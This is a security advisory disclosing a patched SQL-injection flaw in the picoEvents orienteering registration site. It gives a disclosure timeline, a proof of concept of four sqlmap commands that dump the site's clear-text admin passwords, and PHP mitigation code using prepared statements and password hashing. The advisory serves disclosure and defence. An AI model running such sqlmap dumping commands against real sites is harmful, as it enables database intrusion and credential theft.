entry.picoevents.ch - SQL-Injection Vulnerability (#mvid6)

Document Title:
entry.picoevents.ch - SQL-Injection Vulnerability

mosi Vulnerability ID (mvid):
6
Discovery Status:
Patched - Public Disclosure

CVSSv2 Overall Score:
9.6
CVSSv2 Vector:

Product & Service Introduction:
picoEvents provides an online registration and live result service that simplifies timekeeping in orienteering when combined with SPORTident.

Simon Monai, together with Timo Kübler and Namo Flury, found an SQL-injection vulnerability in the web form. It had already been abused to delete the competitions stored in the database on the web server.

Report Timeline:
2017-06-19: Analysis of server attack requested by vendor
2017-06-19: Vulnerability detected
2017-06-19: Vendor informed
2017-06-20: Vendor acknowledged
2017-06-20: Vendor applied workaround
2017-06-21: Patch provided by mosi security research
2017-06-21: Patch faulty
2017-06-26: New patch by mosi security research
2017-06-26: Patch approved by mosi security research
2017-06-27: Public Disclosure

Affected Products:
entry.picoevents.ch - Multisport Registration Page

Exploitation Technique:
SQL Injection

Security Level:

Technical Details & Description:
Request method(s):
[+] GET

Vulnerable Module(s):
[+] http://www.picoevents.ch/entry/multisport/weiche_msp.php?recordID=95

Proof of Concept (PoC):
By running the following commands in the shell of a Kali Linux installation, the administrator account passwords can be gathered:

sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 --dbs
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS --tables
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --columns
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --dump

The results are alarming. The admin passwords are stored in clear text, allowing the hacker to log into the administrator interface and make changes.

Possible Solution:
Validate the GET variables against SQL injection and hash the passwords. A WAF can help prevent further attacks.
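The following PHP shows one way to apply both recommendations to the recordID parameter of weiche_msp.php. It is an added example, not picoEvents' own code or a patch from mosi security research; the database credentials, the table names (competitions, admin) and the column names (id, username, password_hash) are assumptions.

```php
<?php
// Added example: hardened handling of the recordID GET parameter and of
// admin passwords. DSN, credentials, table and column names are assumed.
declare(strict_types=1);

$pdo = new PDO('mysql:host=localhost;dbname=picoEVENTS;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepared statements
]);

// 1. Validate the GET variable: recordID must be a positive integer.
//    Non-numeric or out-of-range input is rejected before any SQL is built.
//    filter_input() returns null when the parameter is absent, false when invalid.
$recordId = filter_input(INPUT_GET, 'recordID', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1],
]);
if ($recordId === null || $recordId === false) {
    http_response_code(400);
    exit('Invalid recordID');
}

// 2. Bind the value as a typed parameter instead of concatenating it into the query.
$stmt = $pdo->prepare('SELECT * FROM competitions WHERE id = :id');
$stmt->bindValue(':id', $recordId, PDO::PARAM_INT);
$stmt->execute();
$competition = $stmt->fetch(PDO::FETCH_ASSOC);

// 3. Store admin passwords as salted hashes, never in clear text, so that a
//    dumped admin table no longer yields usable credentials.
function createAdmin(PDO $pdo, string $username, string $password): void
{
    $stmt = $pdo->prepare('INSERT INTO admin (username, password_hash) VALUES (:u, :h)');
    $stmt->execute([
        ':u' => $username,
        ':h' => password_hash($password, PASSWORD_DEFAULT), // bcrypt at the time of writing
    ]);
}

// Verify the submitted password against the stored hash at login.
function checkAdminLogin(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM admin WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}
```

Existing clear-text rows must be migrated once by running them through password_hash(); password_verify() then accepts the hashed form only.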

Security Risk:
This vulnerability is rated critical (CVSSv2 9.6) and had already been abused.

Author / Credits:
mosi security research - Simon Monai (http://jongliertricks.ch/kontakt)

Public Disclosure:
2017-06-27 - https://jongliertricks.ch/mosi-security-research/40